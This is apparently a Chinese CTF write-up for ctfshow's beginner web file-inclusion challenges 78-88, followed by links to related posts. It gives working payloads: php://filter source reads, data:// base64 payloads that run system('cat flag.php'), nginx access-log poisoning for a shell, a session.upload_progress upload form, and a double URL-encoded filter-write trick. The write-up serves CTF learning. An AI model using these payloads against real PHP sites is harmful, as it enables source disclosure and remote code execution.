ctfshow web入门 78-88的文件包含
1. web78
PHP伪协议读取
?file=php://filter/convert.base64-encode/resource=flag.php
2. web79
?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=
PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs ===> <?php system('cat flag.php');
然后查看源代码
3. web80-81
包含日志文件 进行getshell
日志文件路径:?file=/var/log/nginx/access.log
4. web82-86
利用session.upload_progress进行文件包含
这道题有点像wmctf的make php great again
利用session对话进行文件包含利用
对那道题自己的总结
#poc.php
<!DOCTYPE html>
<html>
<body>
<form action="ip地址" method="POST" enctype="multipart/form-data">
<input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="2333" />
<input type="file" name="file" />
<input type="submit" value="submit" />
</form>
</body>
</html>
5. web87
https://www.leavesongs.com/PENETRATION/php-filter-magic.html
php://filter/write=string.rot13/resource=2.php
原因可能是因为php版本太高了这个过滤器不让用了
使用base64绕过
php://filter/write=convert.base64-decode/resource=3.php
通过url双编码
%25%37%30%25%36%38%25%37%30%25%33%61%25%32%66%25%32%66%25%36%36%25%36%39%25%36%63%25%37%34%25%36%35%25%37%32%25%32%66%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%33%64%25%36%33%25%36%66%25%36%65%25%37%36%25%36%35%25%37%32%25%37%34%25%32%65%25%36%32%25%36%31%25%37%33%25%36%35%25%33%36%25%33%34%25%32%64%25%36%34%25%36%35%25%36%33%25%36%66%25%36%34%25%36%35%25%32%66%25%37%32%25%36%35%25%37%33%25%36%66%25%37%35%25%37%32%25%36%33%25%36%35%25%33%64%25%33%33%25%32%65%25%37%30%25%36%38%25%37%30
因为通过base64过滤之后就只有(phpdie)6个字符我们就要添加2个字符让前面的可以进行编码
6. web88
发现过滤的还是比较多,但是没有过滤:
那我们就可以使用PHP伪协议就是
这里使用的是data://text/plain;base64,poc
其实和79差不多
只是注意的是编码成base64的时候要去掉=
base64的内容是 <?php system('cat fl0g.php'); ?>
ctfshow web入门 78-88的文件包含相关推荐
- [ctfshow]web入门——文件上传(web156-web163)
[ctfshow]web入门--文件上传(web156-web163) [ctfshow]web入门--文件上传 [ctfshow]web入门--文件上传(web156-web163) web156 ...
- ctfshow web入门-sql注入
ctfshow web入门-sql注入 web171 web172 web173 web174 web175 web176 web177 web178 web179 web180 web181 web ...
- [ctfshow web入门]常用姿势801-806
1NDEX 0x00 前言 801 flask pin码计算 谨记!!python 3.8和3.6 pin码生成方式不同 werkzeug版本不同machine-id获取不同 python3.8 pi ...
- ctfshow web入门 命令执行 web29~web77 web118~web124
目录 web29 web30 web31 web32 web33 web34 web35 web36 web37 web38 web39 web40 web41 web42 web43 web44 w ...
- CTFShow web入门题刷题记录
CTFShow web入门题刷题记录(信息搜集) web1 提示:开发注释未及时删除 打开网页查看源代码发现 flag:flag{2b2cf8e3-f880-41e1-a8ff-02601b3d998 ...
- 无字母数字rce(ctfshow web入门56)
无字母数字rce(ctfshow web入门56) 我们根据这一题直接进入主题 //web56 <?php // 你们在炫技吗? if(isset($_GET['c'])){$c=$_GET[' ...
- ctfshow web入门-XXE
ctfshow web入门-XXE web373 题目描述 解题思路 web374 题目描述 解题思路 web375 题目描述 解题思路 web376 题目描述 解题思路 web377 题目描述 解题 ...
- ctfshow web入门 反序列化 前篇 254-266
这里266后面主要是框架,以后在讲 反序列化入门可以参考我写的另一篇很详细的哦~php 反序列化总结 web254 <?phperror_reporting(0); highlight_file ...
- CTFSHOW web入门 命令执行+文件包含+PHP特性
刷题时间记录表 ID 开始时间 结束时间 刷题范围 1 2021.08.23 19:20 2021.08.23 21.30 web41-45 2 2021.08.24 22:16 2021.08.25 ...
最新文章
- 微软Azure AI负责人:OpenAI只能在微软云上训练模型,不懂中台
- JAVA中的通配符的符号_Linux下的通配符和特殊符号用法详解
- php mysql 博客制作_PHP实现简易blog的制作
- 域名服务器的配置文档,配置自己的域名服务器
- 上海女博士“择偶条件”惹争议,相亲像是在许愿,网友:别做梦了 !
- 第十七周项目2-引用作形参
- 视频教程-第03章-二进制、八进制、十进制、十六进制之间的转换-网络技术
- PTA 7-7 新年倒计时
- Docker端口映射只有Ipv6端口导致Ipv4访问不通
- Apparent connection leak detected
- 30天搞定Java--day6
- Fabric.js 铅笔笔刷
- 【超简单】利用Python去除图片水印,太神奇了叭,你还不会嘛?(附三种方法)
- Android wms粗略介绍
- 快来让你的网页色彩绚丽--linear-gradient与radial-gradient
- 创建程序编写demo.py文件
- 用Raphael在网页中画圆环进度条(简化版)
- SAP MM ME56不能为审批后的PR分配货源? 2
- goland-gopath
- Linux两台主机之间建立信任关系
热门文章
- buddypress主题_如何在WordPress 3.0中启用BuddyPress
- 读徐小平的《图穷对话录》后感
- 英语论文投稿与写作36问 [36 Questions on Publishing and Writing English Journal Articles]
- 高阶函数的几种类型与具体实现
- 小米路由器获得BSI物联网安全风筝标志认证;IDC最新数据显示浪潮分布式存储增速中国第一 | 全球TMT...
- 如何策划新闻稿,低成本实现品牌影响力增长
- 前苏联IV-18荧光数码管时钟开发(ИВ-18)
- 好分数阅卷3.0_好分数app下载-好分数网查成绩安卓版app v3.6.4.1-清风安卓软件网...
- 2017.08.20【NOIP提高组】模拟赛B组 【NOIP2014八校联考第4场第2试10.20】星球联盟(alliance)...
- BCS2022|齐向东:“零事故”将成为网络安全建设新目标